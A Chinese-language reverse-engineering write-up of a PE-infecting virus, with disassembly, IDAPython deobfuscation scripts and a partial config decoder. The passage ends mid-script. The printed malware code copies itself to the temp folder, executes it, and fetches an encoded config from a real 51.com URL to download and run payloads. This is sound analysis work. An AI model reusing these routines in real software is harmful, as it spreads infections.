这个是我搞病毒分析以来遇到的相对来说功能比较齐全的病毒,有感染pe文件,有下载执行,有后门功能等。
这个病毒是会感染pe文件的 调试的时候要小心 不过不联网的话 应该不会感染 因为其感染是受网络控制的
入口:
00406F88 >/$ 55 push ebp
00406F89 |. 8BEC mov ebp, esp
00406F8B |. 53 push ebx
00406F8C |. 51 push ecx
00406F8D |. E8 04000000 call 00406F96
00406F92 |. 92 xchg eax, edx
00406F93 |. 5F pop edi
00406F94 |. 0000 add byte ptr [eax], al
00406F96 |$ 5B pop ebx
00406F97 |. 2B1B sub ebx, dword ptr [ebx] ;这里ebx = 401000
00406F99 |. 8B03 mov eax, dword ptr [ebx]
00406F9B |. B9 06610000 mov ecx, 6106
00406FA0 |> 83F9 04 /cmp ecx, 4
00406FA3 |. 72 1A |jb short 00406FBF
00406FA5 |. 81F9 82010000 |cmp ecx, 182
00406FAB |. 73 08 |jnb short 00406FB5
00406FAD |. 81F9 3C010000 |cmp ecx, 13C
00406FB3 |. 77 02 |ja short 00406FB7
00406FB5 |> 3103 |xor dword ptr [ebx], eax
00406FB7 |> 83C3 04 |add ebx, 4
00406FBA |. 83E9 04 |sub ecx, 4
00406FBD |.^ EB E1 \jmp short 00406FA0
00406FBF |> E8 33010000 call 004070F7
发现代码是加密的,解密过程很简单,写个idapython来解密下:
def decrypt_main_exe(startva = 0x401000):
eax = Dword(startva)
#alreay decrypted?
if eax ==0:
return
counter = 0x6106
while True:
if counter < 4:
break
if (counter > 0x13c) and (counter<0x182):
startva = startva + 4
counter = counter -4
else:
dword_value = Dword(startva)
dword_value = dword_value ^ eax
PatchDword(startva,dword_value)
startva = startva + 4
counter = counter -4
走进 004070f7
.text:004070F7 key_call proc near ; CODE XREF: .text:loc_406FBFp
.text:004070F7 call GetFuncsAddress
.text:004070FC test eax, eax
.text:004070FE jz short locret_407105
.text:00407100
.text:00407100 loc_407100:
.text:00407100 call sub_406FCA
.text:00407105
.text:00407105 locret_407105: ; CODE XREF: key_call+7j
.text:00407105 retn
004070f7的call 在ida中直接去大致浏览一下,发现只是获取一些api地址
但是其中用到了一些小技巧来影响我们的反汇编分析
1、获取api地址的时候,比较api地址的前一个字节是否是90 如果是90 则api地址减一,
造成od无法正确的现实api调用。直接ctrl + b 搜索二进制 8038907401 nop掉即可。
00401325 48 dec eax
00401326 8038 90 cmp byte ptr [eax], 90
00401329 74 01 je short 0040132C
0040132B 40 inc eax
获取的api地址为:
00401014 7C80AC28 kernel32.GetProcAddress
00401018 7C801D77 kernel32.LoadLibraryA
0040101C 7C80EB3F kernel32.CreateMutexA
00401020 7C910331 ntdll.RtlGetLastWin32Error
00401024 7C809B77 kernel32.CloseHandle
00401028 7C86114D kernel32.WinExec
0040102C 7C812851 kernel32.GetVersionExA
00401030 7C90311B ntdll.RtlZeroMemory
00401034 7C80C729 kernel32.lstrcpyA
00401038 7C838FB9 kernel32.lstrcatA
0040103C 7C80C6E0 kernel32.lstrlenA
00401040 7C8397A1 kernel32.GetCurrentDirectoryA
00401044 7C80B357 kernel32.GetModuleFileNameA
00401048 7C81082F kernel32.CreateThread
0040104C 7C830053 kernel32.CopyFileA
00401050 7C8221CF kernel32.GetTempPathA
00401054 7C8681F6 kernel32.GetLongPathNameA
00401058 7C81174C kernel32.GetFileAttributesA
写个idapython脚本来对地址进行标记一下:
#encoding=utf-8
#指定iat文件路径,内容是从od里拷出来的
iatfile=r"C:\IDA\idc\py\iat.txt"
def main():
diclist = dict()
hfile = file(iatfile,'r')
for line in hfile.readlines( 
if len(line)>0x10:
address = long(line[0:8],16)
funcname = line.split('.')
if len(funcname) == 2:
name = funcname[1]
#去掉名字后面的换行或者空格
got_name = name[:-1]
diclist[got_name] = address
sorted_dic = map(lambda x:(x[0], x[1]), diclist.items())
for funcname,address in sorted_dic:
address=address & 0xFFFFFFFF
MakeDword(address)
MakeName(address,funcname)
print "address %08x,funcname %s" % (address,funcname)
if __name__ == "__main__":
print "label start"
main()
print "finished"
2、 一些指令变形
0040132C E8 04000000 call 00401335
00401331 1D 0300005B sbb eax, 5B000003
00401336 2B1B sub ebx, dword ptr [ebx]
上面的这几条是变形指令,直接go到00401335可以看到:
0040132C E8 04000000 call 00401335
00401335 5B pop ebx
00401336 2B1B sub ebx, dword ptr [ebx]
上面的三步指令相当于
.text:00401333 mov ebx, 0x401014
其中ebx可以是其他的寄存器,不过在分析过程中只遇到过eax,ebx,edi,esi
类似的变形指令还有
0040127A E8 04000000 call 00401283
00401283 58 pop eax ; Copy_of_.0040127F
00401284 2B00 sub eax, dword ptr [eax]
00401286 FF10 call dword ptr [eax]
实际为:
00401282 FF15 18104000 call dword ptr [401018] ; kernel32.LoadLibraryA
写个idaPython脚本来清理下变形代码:
#encoding=utf-8
def main(startva = 0x401000):
FixSegStart = SegStart(startva)
FixSegEnd = SegEnd(startva)
#print "segstart:%08x segend:%08x" % (FixSegStart,FixSegEnd)
for i in range(FixSegStart, FixSegEnd):
curva = i
if Byte(curva) == 0xe8 and Dword(curva+1) == 0x4:
#定位到call下面的地址
curva = curva + 5
offset = Dword(curva)
#print "offset is %08x" % offset
#if (curva-offset) < FixSegStart:
# print "%08x error" % curva
# continue
call_dest_addr = curva - offset
#print "call_dest_addr is %08x" % call_dest_addr
if Byte(curva+4) == 0x58 and Dword(curva+5) == 0x10ff002b:
print "curva is %08x" % curva
#开始patch代码
PatchByte(curva-5,0x90)
PatchDword(curva-4,0x90909090)
MakeCode(curva-4)
MakeCode(curva-3)
MakeCode(curva-2)
MakeCode(curva-1)
MakeCode(curva-5)
PatchByte(curva,0x90)
PatchByte(curva+1,0x90)
PatchByte(curva+2,0x90)
PatchWord(curva+3,0x15ff)
PatchDword(curva+5,call_dest_addr)
MakeCode(curva-5)
MakeCode(curva+1)
MakeCode(curva+2)
MakeUnknown(curva+3,0x6,0)
HideArea(curva-5, curva + 3, "nop code", "----------", "----------", 0xa0a0a0)
MakeCode(curva+3)
'''
.text:004047E3 E8 04 00 00 00 call loc_4047EC
.text:004047E3 ; ---------------------------------------------------------------------------
.text:004047E8 B3 00 00 00 dd 0B3h
.text:004047EC ; ---------------------------------------------------------------------------
.text:004047EC
.text:004047EC loc_4047EC: ; CODE XREF: .text:004047E3p
.text:004047EC 58 pop eax
.text:004047ED 2B 00 sub eax, [eax]
.text:004047EF 8B 4D 08 mov ecx, [ebp+8]
相当于mov eax,xxx
'''
elif Byte(curva+4) == 0x58 and Word(curva+5) == 0x002b and Word(curva+7) != 0x10ff:
#获取mov的值
pop_eax = curva
dword_eax = Dword(pop_eax)
moved_value = pop_eax - dword_eax
print "moved_value is % 08x" % moved_value
moved_value = moved_value & 0xffffffff
#开始修改代码
PatchByte(curva+2,0xb8)
PatchDword(curva+3,moved_value)
#nop掉之前的代码
PatchDword(curva-5,0x90909090)
PatchWord(curva-1,0x9090)
PatchByte(curva+1,0x90)
#让ida认为这是代码
MakeUnknown(curva-5,0xc,0)
MakeCode(curva-5)
MakeCode(curva-4)
MakeCode(curva-3)
MakeCode(curva-2)
MakeCode(curva-1)
MakeCode(curva+1)
MakeCode(curva+2)
HideArea(curva-5, curva + 2, "nop code", "----------", "----------", 0xa0a0a0)
'''
.text:00404914 E8 04 00 00 00 call loc_40491D
.text:00404914 ; ---------------------------------------------------------------------------
.text:00404919 D0 01 00 00 dd 1D0h
.text:0040491D ; ---------------------------------------------------------------------------
.text:0040491D
.text:0040491D loc_40491D: ; CODE XREF: .text:00404914p
.text:0040491D 5B pop ebx
.text:0040491E 2B 1B sub ebx, [ebx]
'''
elif Byte(curva+4) == 0x5b and Word(curva+5) == 0x1b2b and Word(curva+7) != 0xd3ff:
#获取mov的值
pop_ebx = curva
dword_ebx = Dword(pop_ebx)
moved_value = pop_ebx - dword_ebx
#开始修改代码
PatchByte(curva+2,0xbb)
PatchDword(curva+3,moved_value)
#nop掉之前的代码
PatchDword(curva-5,0x90909090)
PatchWord(curva-1,0x9090)
PatchByte(curva+1,0x90)
#让ida认为这是代码
MakeUnknown(curva-5,0xc,0)
MakeCode(curva-5)
MakeCode(curva-4)
MakeCode(curva-3)
MakeCode(curva-2)
MakeCode(curva-1)
MakeCode(curva+1)
MakeCode(curva+2)
HideArea(curva-5, curva + 2, "nop code", "----------", "----------", 0xa0a0a0)
'''
.text:00405E46 E8 04 00 00 00 call loc_405E4F
.text:00405E46 ; ---------------------------------------------------------------------------
.text:00405E4B FB 45 00 00 dd 45FBh
.text:00405E4F ; ---------------------------------------------------------------------------
.text:00405E4F
.text:00405E4F loc_405E4F: ; CODE XREF: net_activity:loc_405E46p
.text:00405E4F 5F pop edi
.text:00405E50 2B 3F sub edi, [edi] ; 00401850
'''
elif Byte(curva+4) == 0x5f and Word(curva+5) == 0x3f2b and Word(curva+7) != 0xd7ff:
#获取mov的值
pop_edi = curva
dword_edi = Dword(pop_edi)
moved_value = pop_edi - dword_edi
#开始修改代码
PatchByte(curva+2,0xbf)
PatchDword(curva+3,moved_value)
#nop掉之前的代码
PatchDword(curva-5,0x90909090)
PatchWord(curva-1,0x9090)
PatchByte(curva+1,0x90)
#让ida认为这是代码
MakeUnknown(curva-5,0xc,0)
MakeCode(curva-5)
MakeCode(curva-4)
MakeCode(curva-3)
MakeCode(curva-2)
MakeCode(curva-1)
MakeCode(curva+1)
MakeCode(curva+2)
HideArea(curva-5, curva + 2, "nop code", "----------", "----------", 0xa0a0a0)
'''
.text:00402664 E8 04 00 00 00 call loc_40266D
.text:00402664 ; ---------------------------------------------------------------------------
.text:00402669 69 16 00 00 dd 1669h
.text:0040266D ; ---------------------------------------------------------------------------
.text:0040266D
.text:0040266D loc_40266D: ; CODE XREF: Infect_EXE_dll+540j
.text:0040266D 5E pop esi
.text:0040266E 2B 36 sub esi, [esi]
'''
elif Byte(curva+4) == 0x5e and Word(curva+5) == 0x362b and Word(curva+7) != 0xd6ff:
#获取mov的值
pop_esi = curva
dword_esi = Dword(pop_esi)
moved_value = pop_esi - dword_esi
#开始修改代码
PatchByte(curva+2,0xbe)
PatchDword(curva+3,moved_value)
#nop掉之前的代码
PatchDword(curva-5,0x90909090)
PatchWord(curva-1,0x9090)
PatchByte(curva+1,0x90)
#让ida认为这是代码
MakeUnknown(curva-5,0xc,0)
MakeCode(curva-5)
MakeCode(curva-4)
MakeCode(curva-3)
MakeCode(curva-2)
MakeCode(curva-1)
MakeCode(curva+1)
MakeCode(curva+2)
HideArea(curva-5, curva + 2, "nop code", "----------", "----------", 0xa0a0a0)
if __name__ == "__main__":
print "---------------------\nFix Start..."
#fix_call_dword()
main()
print "finished"
现在代码都清理干净了,用ida静态分析即可,有必要可以用od动态调试下,
程序首先会对运行路径以及是否已经有病毒在运行进行一下判断,满足条件才运行病毒代码
.text:00406FCA sub_406FCA proc near ; CODE XREF: key_call:loc_407100p
.text:00406FCA
.text:00406FCA var_7FF7B = byte ptr -7FF7Bh
.text:00406FCA tmp_path = byte ptr -800h
.text:00406FCA filepath = byte ptr -400h
.text:00406FCA
.text:00406FCA push ebp
.text:00406FCB mov ebp, esp
.text:00406FCD add esp, -800h
.text:00406FD3 push 400h ; nSize
.text:00406FD8 lea eax, [ebp+filepath]
.text:00406FDE push eax ; lpFilename
.text:00406FDF push 0 ; hModule
.text:00406FE1 ; nop code
.text:00406FE9 ; ---------------------------------------------------------------------------
.text:00406FE9 call GetModuleFileNameA
.text:00406FEF push 400h ; cchBuffer
.text:00406FF4 lea eax, [ebp+filepath]
.text:00406FFA push eax ; lpszLongPath
.text:00406FFB push eax ; lpszShortPath
.text:00406FFC ; nop code
.text:00407004 call GetLongPathNameA
.text:0040700A lea eax, [ebp+tmp_path]
.text:00407010 push eax ; lpBuffer
.text:00407011 push 400h ; nBufferLength
.text:00407016 ; nop code
.text:0040701E ; ---------------------------------------------------------------------------
.text:0040701E call GetTempPathA
.text:00407024 push 400h ; cchBuffer
.text:00407029 lea eax, [ebp+tmp_path]
.text:0040702F push eax ; lpszLongPath
.text:00407030 push eax ; lpszShortPath
.text:00407031 ; nop code
.text:00407039 ; ---------------------------------------------------------------------------
.text:00407039 call GetLongPathNameA
.text:0040703F lea eax, [ebp+tmp_path]
.text:00407045 push eax ; lpString
.text:00407046 ; nop code
.text:0040704E ; ---------------------------------------------------------------------------
.text:0040704E call lstrlenA
.text:00407054 mov ecx, eax
.text:00407056 lea esi, [ebp+tmp_path]
.text:0040705C lea edi, [ebp+filepath]
.text:00407062
.text:00407062 @compare: ; CODE XREF: sub_406FCA+ACj
.text:00407062 test ecx, ecx
.text:00407064 jz short @equal
.text:00407066 mov al, [esi]
.text:00407068 mov ah, [edi]
.text:0040706A or eax, 2020h
.text:0040706F xor al, ah
.text:00407071 jnz short loc_40708A
.text:00407073 inc esi
.text:00407074 inc edi
.text:00407075 dec ecx
.text:00407076 jmp short @compare
.text:00407078 ; ---------------------------------------------------------------------------
判断程序是否在%tmp%在启动的 如果是 则来到这里 不是则跳到0040708a
.text:00407078
.text:00407078 @equal: ; CODE XREF: sub_406FCA+9Aj
.text:00407078 call @check_mutex 确保只有一个病毒进程在运行
.text:0040707D test eax, eax
.text:0040707F jnz short @ren
.text:00407081 push 0
.text:00407083 call sub_406D4D 运行payload
.text:00407088 jmp short @ren
.text:0040708A ; ---------------------------------------------------------------------------
.text:0040708A
.text:0040708A loc_40708A: ; CODE XREF: sub_406FCA+A7j
.text:0040708A call sub_406D5E 判断病毒启动的目录下是否存在AAA_AAA_AAA_01文件,如果存在则
运行 "explorer.exe C:\Documents and Settings\SRE\Desktop\AAA_AAA_AAA_01"
AAA_AAA_AAA_01是什么呢? 在网上搜了一下,跟极品飞车12的车的修改代码,有关猜测病毒是通过这个传播的
.text:0040708F call @check_mutex
.text:00407094 test eax, eax
.text:00407096 jnz short @ren
.text:00407098 call loc_4070A7
.text:00407098 ; ---------------------------------------------------------------------------
.text:0040709D aPpsap_exe db 'ppsap.exe',0
.text:004070A7 ; ---------------------------------------------------------------------------
.text:004070A7
.text:004070A7 loc_4070A7: ; CODE XREF: sub_406FCA+CEp
.text:004070A7 lea eax, [ebp+tmp_path]
.text:004070AD push eax ; lpString1
.text:004070AE ; nop code
.text:004070B6 ; ---------------------------------------------------------------------------
.text:004070B6 call lstrcatA
拷贝自身到%tmp%\ppsap.exe
.text:004070BC push 0 ; bFailIfExists
.text:004070BE lea eax, [ebp+tmp_path]
.text:004070C4 push eax ; lpNewFileName
.text:004070C5 lea eax, [ebp+filepath]
.text:004070CB push eax ; lpExistingFileName
.text:004070CC ; nop code
.text:004070D4 call CopyFileA
.text:004070DA test eax, eax
.text:004070DC jz short @ren
拷贝成功则运行%tmp%\ppsap.exe
.text:004070DE push 0 ; uCmdShow
.text:004070E0 lea eax, [ebp+tmp_path]
.text:004070E6 push eax ; lpCmdLine
.text:004070E7 ; nop code
.text:004070EF ; ---------------------------------------------------------------------------
.text:004070EF call WinExec
.text:004070F5
.text:004070F5 @ren: ; CODE XREF: sub_406FCA+B5j
.text:004070F5 ; sub_406FCA+BEj ...
.text:004070F5 leave
.text:004070F6 retn
通过上面的代码我们可以看到起主要恶意代码在00406d4d
.text:00406D4D sub_406D4D proc near ; CODE XREF: sub_406FCA+B9p
.text:00406D4D ; DATA XREF: .text:00406EC6o
.text:00406D4D push ebp
.text:00406D4E mov ebp, esp
.text:00406D50
.text:00406D50 loc_406D50:
依然是获取病毒所需的api地址,处理方法同第一次,获取api列表我就不写了
.text:00406D50 call GetFunsAddress_0
.text:00406D55 call @net_activity_start 接下来进行一些网络活动
.text:00406D5A leave
.text:00406D5B retn 4
.text:00406D5B sub_406D4D endp
进入00406d55处的call
.text:00406CB5 @net_activity_start proc near ; CODE XREF: @net_activity_start+92j
.text:00406CB5 ; sub_406D4D+8p
.text:00406CB5 call net_activity
.text:00406CBA test eax, eax
.text:00406CBC jz short loc_406D34
.text:00406CBE push 0 ; protocol
.text:00406CC0 push 2 ; type
.text:00406CC2 push 2 ; af
.text:00406CC4 ; nop code
.text:00406CCC ; ---------------------------------------------------------------------------
.text:00406CCC call socket
.text:00406CD2 ; nop code
.text:00406CD9 mov ebx, offset unk_401860
.text:00406CDE mov [ebx], eax ; dword(00401860) = hsocket
.text:00406CE0 ; nop code
.text:00406CE7 mov eax, 401888h
.text:00406CEC push eax
.text:00406CED ; nop code
.text:00406CF4 mov eax, offset unk_401860
.text:00406CF9 push dword ptr [eax]
.text:00406CFB ; nop code
.text:00406D02 mov eax, offset sub_40512F
.text:00406D07 push eax ; 0040512F
.text:00406D08 call Call_CreateThread
.text:00406D0D call send_data_net_activity
.text:00406D12 ; nop code
.text:00406D19 mov eax, offset unk_401860
.text:00406D1E push dword ptr [eax] ; s
.text:00406D20 mov dword ptr [eax], 0FFFFFFFFh
.text:00406D26 ; nop code
.text:00406D2E ; ---------------------------------------------------------------------------
.text:00406D2E call closesocket
.text:00406D34
.text:00406D34 loc_406D34: ; CODE XREF: @net_activity_start+7j
.text:00406D34 push 1B7740h ; dwMilliseconds
.text:00406D39 ; nop code
.text:00406D41 ; ---------------------------------------------------------------------------
.text:00406D41 call Sleep
.text:00406D47 jmp @net_activity_start
.text:00406D4C ; ---------------------------------------------------------------------------
.text:00406D4C retn
一步步详解其网络行为:
程序首先从http://home.51.com/?u=testdown&c=diary&a=getdataview&id=10049014下载配置文件,然后进行分析处理获得下载连接,
下载执行
.text:00406775 push ecx
.text:00406776 mov [ebp+need_download_config_data_next_or_not], 0
.text:0040677D push 100000h ; dwBytes
.text:00406782 push 40h ; uFlags
.text:00406784 ; nop code
.text:0040678C call GlobalAlloc
.text:00406792 test eax, eax
.text:00406794 jz @retn
.text:0040679A mov [ebp+config_data_for_backdoor], eax
.text:0040679D
.text:0040679D loc_40679D:
.text:0040679D push 100000h
.text:004067A2 push [ebp+config_data_for_backdoor]
.text:004067A5 call loc_4067EB
.text:004067A5 ; ---------------------------------------------------------------------------
.text:004067AA aHttpHome_51_com?uTe db 'http://home.51.com/?u=testdown&c=diary&a=getdataview&id=10049014',0
.text:004067EB ; ---------------------------------------------------------------------------
.text:004067EB
.text:004067EB loc_4067EB: ; CODE XREF: net1+39p
.text:004067EB call Read_configdata_from_net
.text:004067F0 test eax, eax
.text:004067F2 jz short @read_fail
.text:004067F4 push eax ; decrypt data size
.text:004067F5
.text:004067F5 loc_4067F5: ; decrypt data
.text:004067F5 push [ebp+config_data_for_backdoor]
.text:004067F8 call Anslysis_config_data_and_download_execute
下载下来的data:
{
window.modData = {"view":{"id":"10049014","gid":"134960","is_top":"0","heart":"","title":"2010-11-20\u7684\u65e5\u8bb0","memo":"<br \/>\r\n########FPAAAAAACGBKEBBAEJHNEEEOEGFFHAGEGBHEGFDADDDADICOGFHIGFAAGIHEHEHADKCPCPHHHHHHCODBGEGJHDGLCOGDGOCPEDGPGOHEGFGOHEFAGBGOGFCOGBHDHAHIDPGEGPHHGODNGPGLCGGGGJGMGFHAGBHEGIDNHEGFHDHEDHDHDFDICFDCGGEEEOEGCOGEGBHEAA<br \/>\r\n<br \/>\r\n########AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br \/>\r\nqq2install<br \/>\r\n########FLAAAAAADGHOEBJKDELLGCGJHCHEGIGHGJGGHECOGFHIGFAAGIHEHEHADKCPCPHHHHHHCODBGEGJHDGLCOGDGOCPEDGPGOHEGFGOHEFAGBGOGFCOGBHDHAHIDPGEGPHHGODNGPGLCGGGGJGMGFHAGBHEGIDNHEGFHDHEDHDHDFDICFDCGGHBHBDCCOGEGPGDAA <br \/>\r\n<br \/>\r\n ","weekday":"1","show_time":"2010-11-20 17:37:00","flower":"0","egg":"0","ping":"0","click":"4236526","sources":"0","share_flag":"1","share_users":"","hide_comment":"0","share_num":"0","url":"\/testdown\/diary\/item\/10049014.html","_can_view":"1","_desc":"","_putpass":"0","add_time":"1290245878"},"prev":{"id":"0","gid":"0","title":"\u6682\u65e0\u4e0a\u4e00\u7bc7,\u5f53\u524d\u6b63\u662f\u7b2c\u4e00\u7bc7","show_time":"","url":"\/testdown\/diary\/item\/.html"},"next":{"id":"0","gid":"0","title":"\u6682\u65e0\u4e0b\u4e00\u7bc7,\u5f53\u524d\u6b63\u662f\u6700\u540e\u4e00\u7bc7","show_time":"","url":"\/testdown\/diary\/item\/.html"},"catalog":[{"id":"134960","name":"\u6211\u7684\u65e5\u8bb0","hide":"0","url":"\/testdown\/diary\/group\/134960","count":"1"},{"id":"134961","name":"\u6211\u7684\u6587\u7ae0","hide":"0","url":"\/testdown\/diary\/group\/134961","count":"0"},{"id":"134962","name":"\u7f51\u7edc\u6587\u6458","hide":"0","url":"\/testdown\/diary\/group\/134962","count":"0"}],"comment":{"list":{"total":"0","pages":"0","page":"0","rows":[],"userinfo":[]}},"sharelist":[],"lastvisitor":{"rows":[{"nickname":"54243","face":"http:\/\/static.51img1.com\/sysface\/woman_none_50.jpg","sexpic":"http:\/\/static.51img1.com\/v3\/themes\/skins\/images\/woman.gif","viplink":"","isconfirm":"0","isopen":"0","user":"237955579","_user":"5759497","sex":"\u5973\u58eb","prov":"","guestlevel":"","vconfirm":"","vconfirmbg":"","vconfirmword":""},{"nickname":"\u4f0d\u5148\u751f","face":"http:\/\/p3.u.51img1.com\/39\/31\/267956964_50.gif?v=20120330123104","sexpic":"http:\/\/static.51img1.com\/v3\/themes\/skins\/images\/man.gif","viplink":"<a href='http:\/\/51vip.51.com\/level\/vipgrade.php' target='_blank'><img src='http:\/\/static.51img1.com\/i\/kf\/viplevel\/vip1.gif?0401' align='absmiddle' border=0 title='\u6210\u957f\u503c 112' style='filter:none;' \/><\/a> ","isconfirm":"1","isopen":"0","user":"267956964","_user":"91628762","sex":"\u5148\u751f","prov":"","guestlevel":"","vconfirm":"","vconfirmbg":"","vconfirmword":""},{"nickname":"\uff3c\u3002\u88ab\u8fe9\u5ffd\u7565\u3001","face":"http:\/\/p5.u.51img1.com\/55\/d4\/xingfu2025_50.gif?v=20091226161855","sexpic":"http:\/\/static.51img1.com\/v3\/themes\/skins\/images\/woman.gif","viplink":"","isconfirm":"0","isopen":"2","user":"xingfu2025","_user":"xingfu2025","sex":"\u5973\u58eb","prov":"","guestlevel":"","vconfirm":"","vconfirmbg":"","vconfirmword":""},{"nickname":"\u65e0\u804a","face":"http:\/\/static.51img1.com\/sysface\/man_none_50.jpg","sexpic":"http:\/\/static.51img1.com\/v3\/themes\/skins\/images\/man.gif","viplink":"","isconfirm":"1","isopen":"0","user":"vbvbvbzq","_user":"vbvbvbzq","sex":"\u5148\u751f","prov":"","guestlevel":"","vconfirm":"","vconfirmbg":"","vconfirmword":""},{"nickname":"_ \u7eaf \u3001","face":"http:\/\/pe.u.51img1.com\/eb\/fd\/lovening1025_50.gif?v=20101209174127","sexpic":"http:\/\/static.51img1.com\/v3\/themes\/skins\/images\/woman.gif","viplink":"","isconfirm":"1","isopen":"0","user":"lovening1025","_user":"lovening1025","sex":"\u5973\u58eb","prov":"","guestlevel":"","vconfirm":"","vconfirmbg":"","vconfirmword":""},{"nickname":"nacy","face":"http:\/\/pa.u.51img1.com\/a9\/f3\/a20088823_50.gif?v=20090313220255","sexpic":"http:\/\/static.51img1.com\/v3\/themes\/skins\/images\/woman.gif","viplink":"","isconfirm":"0","isopen":"0","user":"a20088823","_user":"a20088823","sex":"\u5973\u58eb","prov":"","guestlevel":"","vconfirm":"","vconfirmbg":"","vconfirmword":""},{"nickname":"\u6e05\u98ce\u4f9d\u65e7","face":"http:\/\/p4.u.51img1.com\/40\/47\/dis13141998_50.gif?v=20110614170758","sexpic":"http:\/\/static.51img1.com\/v3\/themes\/skins\/images\/man.gif","viplink":"","isconfirm":"0","isopen":"0","user":"dis13141998","_user":"dis13141998","sex":"\u5148\u751f","prov":"","guestlevel":"","vconfirm":"","vconfirmbg":"","vconfirmword":""}],"total":"14"},"morediary":[],"current":{"gid":"134960","ghide":"0","gname":"\u6211\u7684\u65e5\u8bb0","gcount":"1","url":"\/testdown\/diary\/group\/134960"}};
}
解密过程:
.text:00401A33 Decrypt_read_data proc near ; CODE XREF: Read_configdata_from_net+19p
.text:00401A33 ; sub_405F62+E7p
.text:00401A33
.text:00401A33 first_dword_after_decrypt= dword ptr -4
.text:00401A33 arg_0_read_data = dword ptr 8
.text:00401A33 arg_4_read_size = dword ptr 0Ch
.text:00401A33
.text:00401A33 push ebp
.text:00401A34 mov ebp, esp
.text:00401A36 add esp, 0FFFFFFFCh
.text:00401A39 push ebx
.text:00401A3A push ecx
.text:00401A3B push edx
.text:00401A3C push edi
.text:00401A3D mov ebx, [ebp+arg_0_read_data]
.text:00401A40 mov ecx, [ebp+arg_4_read_size]
.text:00401A43 sub ecx, 0Ah ; ecx = read_size -8
.text:00401A46
.text:00401A46 @find_loop: ; CODE XREF: Decrypt_read_data+2Aj
.text:00401A46 test ecx, ecx
.text:00401A48 jz short @return_zero
.text:00401A4A cmp dword ptr [ebx], '####'
.text:00401A50 jnz short @next_byte
.text:00401A52 cmp dword ptr [ebx+4], '####'
.text:00401A59 jz short @found_flag ; pass the ######## ebx = found data
.text:00401A5B
.text:00401A5B @next_byte: ; CODE XREF: Decrypt_read_data+1Dj
.text:00401A5B inc ebx
.text:00401A5C dec ecx
.text:00401A5D jmp short @find_loop
.text:00401A5F ; ---------------------------------------------------------------------------
.text:00401A5F
.text:00401A5F @found_flag: ; CODE XREF: Decrypt_read_data+26j
.text:00401A5F add ebx, 8 ; pass the ######## ebx = found data
.text:00401A62 sub ecx, 8 ; ecx = read_size - 8 - found_data_offset -a
.text:00401A62 ; 11d5 for 014
.text:00401A65 mov edi, [ebp+arg_0_read_data]
.text:00401A68 shr ecx, 1 ; 11d5 / 2 = 8ea
.text:00401A6A xor eax, eax
.text:00401A6C
.text:00401A6C @decrypt_loop: ; CODE XREF: Decrypt_read_data+55j
.text:00401A6C test ecx, ecx
.text:00401A6E jz short @decrypt_finished
.text:00401A70 mov ah, [ebx] ; ah = found_data[0]
.text:00401A72 mov al, [ebx+1] ; al = found_data[1]
.text:00401A75 sub eax, 4141h ; eax = eax - 0x4141
.text:00401A7A mov edx, eax ; edx eax - 0x4141
.text:00401A7C shr eax, 4 ; eax = eax >> 4
.text:00401A7F or eax, edx ; eax = (eax - 0x4141 ) | ((eax - 0x4141 )>>4)
.text:00401A81 mov [edi], al ; byte(read_data) = (eax - 0x4141 ) | ((eax - 0x4141 )>>4)
.text:00401A83 add ebx, 2 ; found_data = found_data +2
.text:00401A86 inc edi ; read_data = read_data + 1
.text:00401A87 dec ecx ; ecx --
.text:00401A88 jmp short @decrypt_loop
.text:00401A8A ; ---------------------------------------------------------------------------
.text:00401A8A
.text:00401A8A @decrypt_finished: ; CODE XREF: Decrypt_read_data+3Bj
.text:00401A8A mov ebx, [ebp+arg_0_read_data]
.text:00401A8D mov ecx, [ebx] ; ecx = first_dword_after_decrypt
.text:00401A8F cmp ecx, [ebp+arg_4_read_size]
.text:00401A92 ja short @return_zero
.text:00401A94 mov [ebp+first_dword_after_decrypt], ecx
.text:00401A97 add ebx, 4 ; ebx = read_data + 4
.text:00401A9A movzx edx, word ptr [ebx] ; edx = word(read_data+4)
.text:00401A9D add ebx, 2 ; ebx = read_data + 6
.text:00401AA0 xor eax, eax
.text:00401AA2 mov esi, ebx ; esi ebx = read_data + 6
.text:00401AA4
.text:00401AA4 @add_together: ; CODE XREF: Decrypt_read_data+7Ej
.text:00401AA4 cmp ecx, 4
.text:00401AA7 jb short @add_over
.text:00401AA9 add eax, [esi]
.text:00401AAB add esi, 4
.text:00401AAE sub ecx, 4
.text:00401AB1 jmp short @add_together
.text:00401AB3 ; ---------------------------------------------------------------------------
.text:00401AB3
.text:00401AB3 @add_over: ; CODE XREF: Decrypt_read_data+74j
.text:00401AB3 and eax, 0FFFFh
.text:00401AB8 cmp eax, edx
.text:00401ABA jz short @data_is_right
.text:00401ABC
.text:00401ABC @return_zero: ; CODE XREF: Decrypt_read_data+15j
.text:00401ABC ; Decrypt_read_data+5Fj
.text:00401ABC mov [ebp+first_dword_after_decrypt], 0
.text:00401AC3 jmp short @retn
.text:00401AC5 ; ---------------------------------------------------------------------------
.text:00401AC5
.text:00401AC5 @data_is_right: ; CODE XREF: Decrypt_read_data+87j
.text:00401AC5 mov ecx, [ebp+first_dword_after_decrypt]
.text:00401AC8 mov edi, [ebp+arg_0_read_data]
.text:00401ACB mov esi, edi
.text:00401ACD add esi, 6
.text:00401AD0 rep movsb
.text:00401AD2
.text:00401AD2 @retn: ; CODE XREF: Decrypt_read_data+90j
.text:00401AD2 mov eax, [ebp+first_dword_after_decrypt]
.text:00401AD5 pop edi
.text:00401AD6 pop edx
.text:00401AD7 pop ecx
.text:00401AD8 pop ebx
.text:00401AD9 leave
.text:00401ADA retn 8
.text:00401ADA Decrypt_read_data endp
写个脚本来模拟其解密过程,顺便监控其下载的配置文件,
写个脚本也不用每次都调试,直接运行脚本就可以获取其解密后配置文件:
import re, struct, os, sys
def Decrypt_Config(srcData, hOutFile):
currIndex = 0
data_len = len(srcData)
ecx = data_len - 0xa
p = re.compile(r'########(.*)',re.DOTALL)
m = p.search(srcData)
decrypt_data = []
if m:
found_offset = m.start(1)
ecx = ecx - found_offset
ecx = ecx >> 1
#print "ecx %08x" % ecx
while ecx != 0:
ah = srcData[found_offset]
al = srcData[found_offset+1]
eax = (ord(ah) << 0x8) | ord(al)
#print "eax %08x" % eax
eax = eax - 0x4141
edx = eax
eax = eax >> 4
eax = edx | eax
#print "after or eax %08x" % eax
decrypt_data.append(chr(eax & 0xff))
found_offset = found_offset+2
ecx = ecx - 1
decrypt_data_ = "".join(decrypt_data)
first_dword = struct.unpack('I',decrypt_data_[0:4])[0]
if first_dword <= data_len:
